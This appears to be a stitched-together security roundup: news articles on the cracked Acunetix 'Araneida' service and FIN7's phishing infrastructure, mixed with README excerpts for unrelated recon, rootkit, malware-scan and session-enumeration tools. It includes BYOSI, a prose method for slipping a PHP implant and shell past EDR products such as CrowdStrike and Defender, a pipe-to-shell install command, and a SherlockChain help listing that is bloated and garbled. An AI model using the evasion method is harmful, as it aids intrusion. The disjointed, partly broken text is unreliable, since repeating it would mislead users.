Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.
Araneida Scanner.
Cyber threat analysts at Silent Push said they recently received reports from a partner organization that identified an aggressive scanning effort against their website using an Internet address previously associated with a campaign by FIN7, a notorious Russia-based hacking group.
But on closer inspection they discovered the address contained an HTML title of βAraneida Customer Panel,β and found they could search on that text string to find dozens of unique addresses hosting the same service.
It soon became apparent that Araneida was being resold as a cloud-based service using a cracked version of Acunetix, allowing paying customers to conduct offensive reconnaissance on potential target websites, scrape user data, and find vulnerabilities for exploitation.
Silent Push also learned Araneida bundles its service with a robust proxy offering, so that customer scans appear to come from Internet addresses that are randomly selected from a large pool of available traffic relays.
The makers of Acunetix, Texas-based application security vendor Invicti Security, confirmed Silent Pushβs findings, saying someone had figured out how to crack the free trial version of the software so that it runs without a valid license key.
βWe have been playing cat and mouse for a while with these guys,β said Matt Sciberras, chief information security officer at Invicti.
Silent Push said Araneida is being advertised by an eponymous user on multiple cybercrime forums. The serviceβs Telegram channel boasts nearly 500 subscribers and explains how to use the tool for malicious purposes.
In a βFun Factsβ list posted to the channel in late September, Araneida said their service was used to take over more than 30,000 websites in just six months, and that one customer used it to buy a Porsche with the payment card data (βdumpsβ) they sold.
Araneida Scannerβs Telegram channel bragging about how customers are using the service for cybercrime.
βThey are constantly bragging with their community about the crimes that are being committed, how itβs making criminals money,β saidΒ Zach Edwards, a senior threat researcher at Silent Push. βThey are also selling bulk data and dumps which appear to have been acquired with this tool or due to vulnerabilities found with the tool.β
Silent Push also found a cracked version of Acunetix was powering at least 20 instances of a similar cloud-based vulnerability testing service catering to Mandarin speakers, but they were unable to find any apparently related sales threads about them on the dark web.
Rumors of a cracked version of Acunetix being used by attackers surfaced in June 2023 on Twitter/X, when researchers first posited a connection between observed scanning activity and Araneida.
According to an August 2023 report (PDF) from the U.S. Department of Health and Human Services (HHS), Acunetix (presumably a cracked version) is among several tools used by APT 41, a prolific Chinese state-sponsored hacking group.
Silent Push notes that the website where Araneida is being sold β araneida[.]co β first came online in February 2023. But a review of this Araneida nickname on the cybercrime forums shows they have been active in the criminal hacking scene since at least 2018.
A search in the threat intelligence platform Intel 471 shows a user by the name Araneida promoted the scanner on two cybercrime forums since 2022, including Breached and Nulled. In 2022, Araneida told fellow Breached members they could be reached on Discord at the username βOrnie#9811.β
According to Intel 471, this same Discord account was advertised in 2019 by a person on the cybercrime forum Cracked who used the monikers βORNβ and βori0n.β The user βori0nβ mentioned in several posts that they could be reached on Telegram at the username β@sirorny.β
Orn advertising Araneida Scanner in Feb. 2023 on the forum Cracked. Image: Ke-la.com.
The Sirorny Telegram identity also was referenced as a point of contact for a current user on the cybercrime forum Nulled who is selling website development services, and who references araneida[.]co as one of their projects. That user, βExorn,β has posts dating back to August 2018.
In early 2020, Exorn promoted a website called βorndorks[.]com,β which they described as a service for automating the scanning for web-based vulnerabilities. A passive DNS lookup on this domain at DomainTools.com shows that its email records pointed to the address ori0nbusiness@protonmail.com.
Constella Intelligence, a company that tracks information exposed in data breaches, finds this email address was used to register an account at Breachforums in July 2024 under the nickname βOrnie.β Constella also finds the same email registered at the website netguard[.]codes in 2021 using the password βceza2003β [full disclosure: Constella is currently an advertiser on KrebsOnSecurity].
A search on the password ceza2003 in Constella finds roughly a dozen email addresses that used it in an exposed data breach, most of them featuring some variation on the name βaltugsara,β including altugsara321@gmail.com. Constella further finds altugsara321@gmail.com was used to create an account at the cybercrime community RaidForums under the username βori0n,β from an Internet address in Istanbul.
According to DomainTools, altugsara321@gmail.com was used in 2020 to register the domain name altugsara[.]com. Archive.orgβs history for that domain shows that in 2021 it featured a website for a then 18-year-old AltuΔ Εara from Ankara, Turkey.
Archive.orgβs recollection of what altugsara dot com looked like in 2021.
LinkedIn finds this same altugsara[.]com domain listed in the βcontact infoβ section of a profile for an Altug Sara from Ankara, who says he has worked the past two years as a senior software developer for a Turkish IT firm called Bilitro Yazilim.
Neither Altug Sara nor Bilitro Yazilim responded to requests for comment.
Invictiβs website states that it has offices in Ankara, but the companyβs CEO said none of their employees recognized either name.
βWe do have a small team in Ankara, but as far as I know we have no connection to the individual other than the fact that they are also in Ankara,β Invicti CEO Neil Roseman told KrebsOnSecurity.
Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly βnoisyβ scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.
Whatβs more, the cracked version of Acunetix being resold to cybercriminals invokes legacy Acunetix SSL certificates on active control panels, which Silent Push says provides a solid pivot for finding some of this infrastructure, particularly from the Chinese threat actors.
Further reading: Silent Pushβs research on Araneida Scanner.
secator
is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Complexity from simple tasks to complex workflows
secator
integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator
, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator
uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator
does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt
:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator
comes installed with the minimum amount of dependencies.
There are several addons available for secator
:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator
makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf
):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
and more... to list all tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator
, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
A make an LKM rootkit visible again.
It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit.
We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs, however, it is only available from kernel 6.5x onwards.
An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed.
So in summary, this LKM abuses the function of lkm rootkits that have the functionality to become visible again.
OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will be launched.
Evade EDR's the simple way, by not touching any of the API's they hook.
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)
With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.
A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.
It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.
hello sentinel one :) might want to make sure that you are making links not embed.
The Russia-based cybercrime group dubbed βFin7,β known for phishing and malware attacks that have cost victim organizations an estimated $3 billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024 β setting up thousands of websites mimicking a range of media and technology companies β with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
In May 2023, the U.S. attorney for Washington state declared βFin7 is an entity no more,β after prosecutors secured convictions and prison sentences against three men found to be high-level Fin7 hackers or managers. This was a bold declaration against a group that the U.S. Department of Justice described as a criminal enterprise with more than 70 people organized into distinct business units and teams.
The first signs of Fin7βs revival came in April 2024, when Blackberry wrote about an intrusion at a large automotive firm that began with malware served by a typosquatting attack targeting people searching for a popular free network scanning tool.
Now, researchers at security firm Silent Push say they have devised a way to map out Fin7βs rapidly regrowing cybercrime infrastructure, which includes more than 4,000 hosts that employ a range of exploits, from typosquatting and booby-trapped ads to malicious browser extensions and spearphishing domains.
Silent Push said it found Fin7 domains targeting or spoofing brands including American Express, Affinity Energy, Airtable, Alliant, Android Developer, Asana, Bitwarden, Bloomberg, Cisco (Webex), CNN, Costco, Dropbox, Grammarly, Google, Goto.com, Harvard, Lexis Nexis, Meta, Microsoft 365, Midjourney, Netflix, Paycor, Quickbooks, Quicken, Reuters, Regions Bank Onepass, RuPay, SAP (Ariba), Trezor, Twitter/X, Wall Street Journal, Westlaw, and Zoom, among others.
Zach Edwards, senior threat analyst at Silent Push, said many of the Fin7 domains are innocuous-looking websites for generic businesses that sometimes include text from default website templates (the content on these sites often has nothing to do with the entityβs stated business or mission).
Edwards said Fin7 does this to βageβ the domains and to give them a positive or at least benign reputation before theyβre eventually converted for use in hosting brand-specific phishing pages.
βIt took them six to nine months to ramp up, but ever since January of this year they have been humming, building a giant phishing infrastructure and aging domains,β Edwards said of the cybercrime group.
In typosquatting attacks, Fin7 registers domains that are similar to those for popular free software tools. Those look-alike domains are then advertised on Google so that sponsored links to them show up prominently in search results, which is usually above the legitimate source of the software in question.
A malicious site spoofing FreeCAD showed up prominently as a sponsored result in Google search results earlier this year.
According to Silent Push, the software currently being targeted by Fin7 includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
In May 2024, security firm eSentire warned that Fin7 was spotted using sponsored Google ads to serve pop-ups prompting people to download phony browser extensions that install malware. Malwarebytes blogged about a similar campaign in April, but did not attribute the activity to any particular group.
A pop-up at a Thomson Reuters typosquatting domain telling visitors they need to install a browser extension to view the news content.
Edwards said Silent Push discovered the new Fin7 domains after a hearing from an organization that was targeted by Fin7 in years past and suspected the group was once again active. Searching for hosts that matched Fin7βs known profile revealed just one active site. But Edwards said that one site pointed to many other Fin7 properties at Stark Industries Solutions, a large hosting provider that materialized just two weeks before Russia invaded Ukraine.
As KrebsOnSecurity wrote in May, Stark Industries Solutions is being used as a staging ground for wave after wave of cyberattacks against Ukraine that have been tied to Russian military and intelligence agencies.
βFIN7 rents a large amount of dedicated IP on Stark Industries,β Edwards said. βOur analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure.β
Fin7 once famously operated behind fake cybersecurity companies β with names like Combi Security and Bastion Secure β which they used for hiring security experts to aid in ransomware attacks. One of the new Fin7 domains identified by Silent Push is cybercloudsec[.]com, which promises to βgrow your business with our IT, cyber security and cloud solutions.β
The fake Fin7 security firm Cybercloudsec.
Like other phishing groups, Fin7 seizes on current events, and at the moment it is targeting tourists visiting France for the Summer Olympics later this month. Among the new Fin7 domains Silent Push found are several sites phishing people seeking tickets at the Louvre.
βWe believe this research makes it clear that Fin7 is back and scaling up quickly,β Edwards said. βItβs our hope that the law enforcement community takes notice of this and puts Fin7 back on their radar for additional enforcement actions, and that quite a few of our competitors will be able to take this pool and expand into all or a good chunk of their infrastructure.β
Further reading:
Stark Industries Solutions: An Iron Hammer in the Cloud.
A 2022 deep dive on Fin7 from the Swiss threat intelligence firm Prodaft (PDF).
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt
A detailed usage guide is available on Usage section of the Wiki.
But Some index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth
.
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.
Note:
This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (
".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"
). You can customize this list to better suit your needs by editing the setting.json file..
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help
command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
Vulnerability Detection: The --detect
and --exclude-detectors
options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
--report-format
, --report-output
, and various --report-*
options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).--filter-*
options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.--ai-*
options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.--truffle
and --truffle-build-directory
facilitate the integration of SherlockChain into popular development frameworks like Truffle.The --help
command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
--detect
, --exclude-detectors
--report-format
, --report-output
, --report-*
--filter-*
--ai-*
--truffle
, --truffle-build-directory
--compile
, --list-detectors
, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
## Detectors |
It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.
Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.
The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.
This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.
AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.
Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.
AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.
The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.
Amazon Security Hub enabled. If not, please check this documentation
Warning
Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.
Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan
cd drs-malware-scan
sh check_loggroup.sh
Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment
npm install
cdk bootstrap
cdk deploy --all
Note
The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
* ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack
If you want to deploy both stacks you can run cdk deploy --all
All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-*
pattern.
The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations
lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.
The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console
The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.
Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan
In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events
Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
Run the following commands in your terminal:
cdk destroy --all
(Optional) Delete the CloudWatch log groups associated with Lambda Functions.
For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.
Monthly Cost | Total Cost for 12 Months |
---|---|
171.22 USD | 2,054.74 USD |
Service Name | Description | Monthly Cost (USD) |
---|---|---|
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
Amazon DynamoDB | 100MB 1 Read/Second 1 Writes/Second | 3.65 |
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Finding Ingested | 0.10 |
AWS EventBridge | 1M custom events | 1.00 |
Amazon Cloudwatch | 1GB ingested/month | 0.50 |
AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
Amazon SQS | 2 SQS Fifo | 0.00 |
Total | 171.22 |
Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)
See CONTRIBUTING for more information.
Retrieve and display information about active user sessions on remote computers. No admin privileges required.
The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
If the -CheckAdminAccess
switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)
